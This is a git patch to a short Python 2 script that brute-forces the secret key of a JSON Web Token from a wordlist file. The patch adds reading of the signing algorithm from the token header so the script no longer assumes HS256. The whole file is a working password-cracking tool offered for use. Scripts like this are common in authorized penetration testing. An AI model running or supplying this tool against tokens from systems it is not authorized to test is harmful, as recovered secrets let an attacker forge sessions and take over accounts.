From 5a8da7767408737f44ea15b35a8b0843156d9cc3 Mon Sep 17 00:00:00 2001
From: Thomas Leplus <thomasleplus@users.noreply.github.com>
Date: Sat, 4 Aug 2018 16:18:22 -0700
Subject: [PATCH] Auto-detect algorithm

---
 brute-jwt.py | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/brute-jwt.py b/brute-jwt.py
index 6bd0fd1..00bf506 100644
--- a/brute-jwt.py
+++ b/brute-jwt.py
@@ -1,19 +1,25 @@
 #!/usr/bin/python
 
-import jwt;
+import base64
+import json
+import jwt
 from termcolor import colored
 
 print colored("Script to brute-force JWT secret token",'white')
 encoded = raw_input("Enter encoded payload: ")
 
+header_base64, remainder = encoded.split(b'.', 1)
+header_json = base64.b64decode(header_base64)
+algorithm = json.loads(header_json.decode('utf-8')).get('alg')
+print colored('Detected algorithm [' + algorithm + ']','green')
 
 with open('secret.txt') as secrets:
     for secret in secrets:
         try:
-            payload = jwt.decode(encoded, secret.rstrip(), algorithms=['HS256'])
+            payload = jwt.decode(encoded, secret.rstrip(), algorithm)
             print colored('Success! Token decoded with ....[' + secret.rstrip() + ']','green')
             break
         except jwt.InvalidTokenError:
             print colored('Invalid Token .... [' + secret.rstrip() + ']','red')
         except jwt.ExpiredSignatureError:
-            print colored('Token Expired ....[' + secret.rstrip() + ']','red')
\ No newline at end of file
+            print colored('Token Expired ....[' + secret.rstrip() + ']','red')